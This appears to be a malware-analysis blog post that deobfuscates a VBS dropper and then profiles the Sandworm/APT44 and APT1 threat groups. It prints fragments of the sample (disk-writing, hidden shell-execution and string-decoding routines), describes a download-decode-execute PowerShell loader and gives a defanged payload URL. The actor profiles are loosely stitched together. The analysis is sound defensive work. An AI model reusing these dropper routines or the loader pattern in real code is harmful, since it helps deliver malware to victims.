Original filename: Pak_Afghan_War_Impact_on_Northern_Border_India.vbs. I made a copy and renamed it to ap3.vbs for analysis.
When opening the file, you immediately notice a lot of Danish-looking comments/words scattered through the source. These are purely noise, they are there to hinder analysis and evade signature detection. But underneath the noise we can still find Visual Basic constructs that we want to extract.
We can filter out those comment lines very easily.
grep -v "^'" apt33.vbs | sed '/^[[:space:]]*$/d' > apt33_clean.vbs
The output looks much cleaner now, clear VB structures are visible, although the script remains heavily obfuscated.
The next step is to remove additional noise by deleting variables or code blocks that are only used in initialization and never referenced later.
After cleanup, the following code remains:
This is already much tidier. We identified three functions of interest: Crocodilite, Subskribenten, and Cashoo. They are small and not deeply obfuscated, so we can determine their purpose fairly quickly. It’s often useful at this stage to rename obfuscated variables and functions to meaningful names.
Crocodilite
This function creates a text file and writes the passed string into it. In this sample it is used to write the content of the variable tendrilous into Abaris.txt.
' ORIGINAL
Sub Crocodilite(Tudemiklens, Fissuriform)
Dim Sinh, Galactometer
Set Sinh = CreateObject("Scripting.FileSystemObject")
Set Galactometer = Sinh.CreateTextFile(Fissuriform, True)
Galactometer.Write Tudemiklens
Galactometer.Close
End Sub
' ADJUSTED
Sub write_to_file(text, path)
Dim fileSysObj, file
Set fileSysObj = CreateObject("Scripting.FileSystemObject")
Set file = fileSysObj.CreateTextFile(path, True)
file.Write text
file.Close
Subskribenten
This is a simple wrapper that executes a command via WScript.Shell. It’s used to invoke the payload that was written to disk.
' ORIGINAL
Set Plenicorn = CreateObject("WScript.Shell")
...
Function Subskribenten(Tautegorical)
Call Plenicorn.Run(Tautegorical,0)
End Function
' ADJUSTED
Set shell = CreateObject("WScript.Shell")
...
Function Execute(payload)
Call shell.Run(payload,0)
Cashoo
A decoder routine. It extracts characters at fixed intervals from a masking string (i.e. it removes padding characters and reconstructs the hidden string). This is a classic technique to hide URLs, commands or other sensitive strings from static signature scanners.
' ORIGINAL
Function Cashoo(ByVal Microsphaeric)
for i = 4 to len(Text) Step 4
' Mid(string, start, length) extract a specified amount of characters from a string
Cashoo = Cashoo & Mid(Text,i,Alenlang)
Next
End Function
' ADJUSTED
Function ExtractEveryFourthChar(ByVal Text)
for i = 4 to len(Text) Step 4
' Mid(string, start, length) extract a specified amount of characters from a string
ExtractEveryFourthChar = ExtractEveryFourthChar & Mid(Text,i,Alenlang)
Next
End Function
I implemented a Python equivalent to decode the payload. After I finished the script I fed several encoded strings from the VB file through it. Additionally i loaded every string found for the variable “tendrilous” into a separate file “tendrilous.txt” for decoding purposes. You can view the script here.
The Python routine works as intended: it reads Abaris.txt, extracts a three-character command name from a specific offset, and would invoke that command with the file content as parameter i.e., dynamic code execution.
I also implemented a Python equivalent for this routine; the script is available in the repository.
After running my script, the payload output looks like this:
At first glance the output looks nasty, but it can be disentangled. Don’t panic. I applied line breaks and indentation in the right places to make control flow and function calls visible.
To make the code more readable I used the following commands:
sed -i 's/;\$/;\n\$/g' "$1"
sed -i 's/;Cenogenesis/;\nCenogenesis/g' "$1"
sed -i 's/{/{\n/g' "$1"
sed -i 's/}/\n}\n/g' "$1"
sed -i 's/;function/;\nfunction/g' "$1"
sed -i 's/;while/;\nwhile/g' "$1"
The result now looks much more promising:
There is still some noise embedded in a few places. We also discovered repeated calls to the Roberts function with additional encoded strings. I wrote a Python helper to extract those strings from the file and decode them with the same Roberts / Cashoo logic.
When we run that pipeline and merge the output under the previous deobfuscated view, we obtain the following consolidated result:
Final Script
This is the final deobfuscated dropper script. From it we can conclude the following:
The script repeatedly attempts to download a remote file from a suspicious URL and save it locally.
Once the file is available, it reads parts of it, Base64-decodes contained data, and reconstructs executable PowerShell code.
Finally, it executes that decoded code dynamically (via dot-sourcing / Invoke-Expression style execution). This is a classic loader / bootstrapper pattern for delivering secondary stages of malware.
There are some formatting glitches in the decompiled output that likely arose during processing, but the overall intent is clear.
The dropper notably points at hxxps[://]zohmailcloud[.]com//cloud/Assholes[.]psm as one of the remote payload locations. I could not retrieve the file, the URL is no longer reachable but I did find a Twitter post referencing the file with MD5 7a5fe1af036b6dba35695e6d4f5cc80f.
If I manage to acquire the remote artifact later, I will write a dedicated follow-up article with a full 2nd-stage analysis.
Origin: Russia, linked to MUN 74455, a cyberwarfare unit of the GRU, Russia’s military intelligence service
Active Since: 2004
Primary Targets: Western corporations, government organizations, defense contractors
Motivation: Cybersabotage , Data theft
Tactics & Techniques (CLICK TO OPEN)
Tactics & Techniques: Initial Access – T1190 – Exploit Public-Facing Application. – T1203 – Exploitation for Client Execution. – T1199 / related: Spearphishing / Use of malicious files (spearphishing attachments / malicious files) Execution – T1059 – Command and Scripting Interpreter. – T1059.001 – PowerShell. – T1059.003 – Windows Command Shell. – T1059.005 – Visual Basic (VBS). Persistence – T1543 / Create or Modify System Process (Service techniques) – z. B. Windows Service / Systemd service modifications. – T1053.005 – Scheduled Task (Scheduled Task used via GPOs / scheduled jobs). Privilege Escalation – (verschiedene techniques observed in campaign artifacts; see Mandiant for low-level syscall / evasive behaviors) Defense Evasion – T1140 – Deobfuscate/Decode Files or Information (Base64, TripleDES, GZip usage). – T1202 / Obfuscated Files or Information (software packing / obfuscation). – T1562 / Impair Defenses – e.g., Disable or Modify Tools; Disable Windows Event Logging. Credential Access – T1555.003 – Credentials from Password Stores: Credentials from Web Browsers. – T1003 (OS Credential Dumping) – e.g., LSASS memory dumping observed historically. – T1056.001 – Input Capture: Keylogging (SetWindowsHookEx keylogger observed). Discovery – T1087.002 – Account Discovery: Domain Account discovery via LDAP queries. – T1592.002 – Gather Victim Host Information: Software. – T1018 – Remote System Discovery. – T1046 / Network Service Scanning (Active Scanning / vulnerability scanning). Lateral Movement – T1021.002 – Remote Services: SMB/Windows Admin Shares (use of ADMIN$, net use). – T1570 – / Lateral Tool Transfer / Ingress Tool Transfer (copying payloads, using network shares). Collection – T1213 – Data from Information Repositories (databases) – e.g., use of Adminer to exfiltrate DB data. – T1005 – Data from Local System (internal docs, files). Exfiltration – T1041 – Exfiltration Over C2 Channel (HTTP C2 exfil observed). Command and Control – T1071.001 – Application Layer Protocol: Web Protocols (HTTP used by BCS-server and other tools). – Protocol Tunneling / non-standard channels have also been used in some campaigns. Impact – T1486 – Data Encrypted for Impact (ransomware / Prestige used). – T1561.002 – Disk Wipe: Disk Structure Wipe (KillDisk/CaddyWiper usage). – T1484.001 – Domain or Tenant Policy Modification: Group Policy Modification (used to deploy wipers via GPO). – T1499 – Endpoint Denial of Service (observed in disruption campaigns). – T1491.002 – Defacement: External Defacement (mass website defacements). Resource Development / Recon & Support (preparation) – T1583 – Acquire Infrastructure (domains, servers, covert leased infrastructure). – T1583.001 – Domains (register spoofing domains). – T1583.004 – Server (use of leased / reseller infrastructure). – T1595.002 – Active Scanning: Vulnerability Scanning (scanning target infrastructure). Other observed behaviours / capabilities – Use of custom destructive malware families (NotPetya, Industroyer variants, Olympic Destroyer, CaddyWiper, etc.). – Use of third-party services for phishing campaigns and use of spoofed pages for credential harvesting.
Notable Campaigns:
Exfiltration of corporate data across multiple industries, including aerospace, energy, and technology
Attributed Tools & Malware:
BlackEnergy (BlackEnergy 3) – former backdoor/botnet framework used in attacks on Ukrainian energy suppliers (2015), among others.
KillDisk (various wiper variants) – Destructive component used to destroy hosts in multiple campaigns.
NotPetya / ExPetr (wiper masquerading as ransomware) – large-scale destruction/worm campaign in 2017.
Industroyer / Industroyer2 (CrashOverride) – specifically designed for industrial control systems (ICS); the Industroyer family has been observed in Ukrainian infrastructure operations.
Olympic Destroyer – Wiper/disruption malware used against the Pyeongchang Olympics; attribution was complicated, but often linked to Sandworm.
CaddyWiper / other GPO/AD wipers – modern wiper variants that have appeared in recent sabotage campaigns.
Infamous Chisel (Android components / Infamous Chisel family) – Persistent access/backdoor components for Android (2023 reports on Android targets).
SwiftSlicer / AD-viper / Active Directory wipers – local/AD-targeted wiper components that appear in attack reports in 2023–2024.
Custom C2/Beacon implementations & loaders (TeleBots / bespoke tooling) – Sandworm used its own C2 backdoors, beacon implementations, and droppers; TeleBots branding appears in connection with NotPetya.
Downloaders / droppers / Android wrappers / malicious app wrappers – previous campaigns showed downloader wrappers in Play Store apps and disguised Android apps to deliver additional components.
APT44 (commonly tracked as Sandworm Team or GRU Unit 74455) is a state-sponsored Russian cyber-espionage and sabotage actor known for highly targeted, persistent operations against government, military, critical-infrastructure, and high-value private sector targets. The group blends sophisticated custom tooling with commodity malware and living-off-the-land techniques to gain access, escalate privileges, move laterally, and maintain stealthy persistence. Its campaigns range from long-term intelligence collection to disruptive, destructive actions, deploying modular router malware, destructive wipers, and ICS-focused toolsets when operational goals demand sabotage. Operators demonstrate strong operational security, anti-sandbox/anti-analysis measures, and careful timing to align cyber activity with geopolitical objectives.
GOGGLES – Downloader used by the group (serves as a payload/secondary-stage downloader).
GLASSES – A variant or close relative of GOGGLES; identified in a Citizen Lab analysis and likely an earlier or related implementation.
AURIGA / BANGAT – Tools linked to a developer tracked as “SuperHard”; mentioned by Mandiant but not always named in the public report.
Email-exfiltration utilities:GETMAIL (used to extract PST files) and MAPIGET (used to read emails that haven’t been archived).
Public privilege-escalation tools: examples include cachedump, fgdump, and gsecdump, not unique to APT1 but observed in their operations.
HTRAN (HUC Packet Transmit Tool) – used as a hop/proxy relay to forward communications between victims and command-and-control servers, helping to obscure origin and routing.
APT1, often called the Comment Crew or PLA Unit 61398, is one of the most infamous and well-documented cyber espionage groups linked to the Chinese government. First brought into the spotlight by Mandiant’s 2013 report, APT1 was among the first hacking units publicly tied to a specific branch of China’s military, the People’s Liberation Army, revealing the true scale of state-backed digital espionage for economic and strategic gain.
Active since at least 2006, APT1 ran one of the most disciplined and long-running hacking operations ever uncovered. Its members focused on stealing intellectual property and confidential business information from hundreds of organizations across industries like aerospace, defense, energy, telecom, and manufacturing – mostly in the United States, but also in Europe and Asia. Everything they took seemed to serve China’s national interests, whether by boosting its industries or informing military and political strategies.
Technically, APT1 was known for its methodical and repeatable playbook. The group broke in through targeted phishing emails and custom malware such as the WEBC2 family (with variants like WEBC2-AUSOV and WEBC2-GREENCAT). Once inside, they established persistence with credential-stealing tools (GETMAIL, MAPIGET, FGDump) and routed stolen data through a vast command-and-control network of more than 1,000 servers and 2,500 domains, often masked with tools like HTRAN to hide their tracks. Their infrastructure and coding style were remarkably consistent, the work of full-time engineers, not lone hackers.
What made APT1 stand out wasn’t just the scale of its operations, but the professionalism behind it. Investigators found evidence of shift-based work hours, organized infrastructure, and shared codebases, all pointing to a state-run, military-grade espionage unit based in Shanghai. The exposure of APT1 changed how the world viewed cyber conflict, proving that digital espionage could be conducted with the same structure and intent as any traditional military campaign.
In many ways, APT1 set the template for the modern nation-state hacking group: large, organized, patient, and focused on long-term strategic advantage rather than chaos or quick profit. Its legacy still shapes how governments and companies think about cybersecurity and geopolitical risk today.
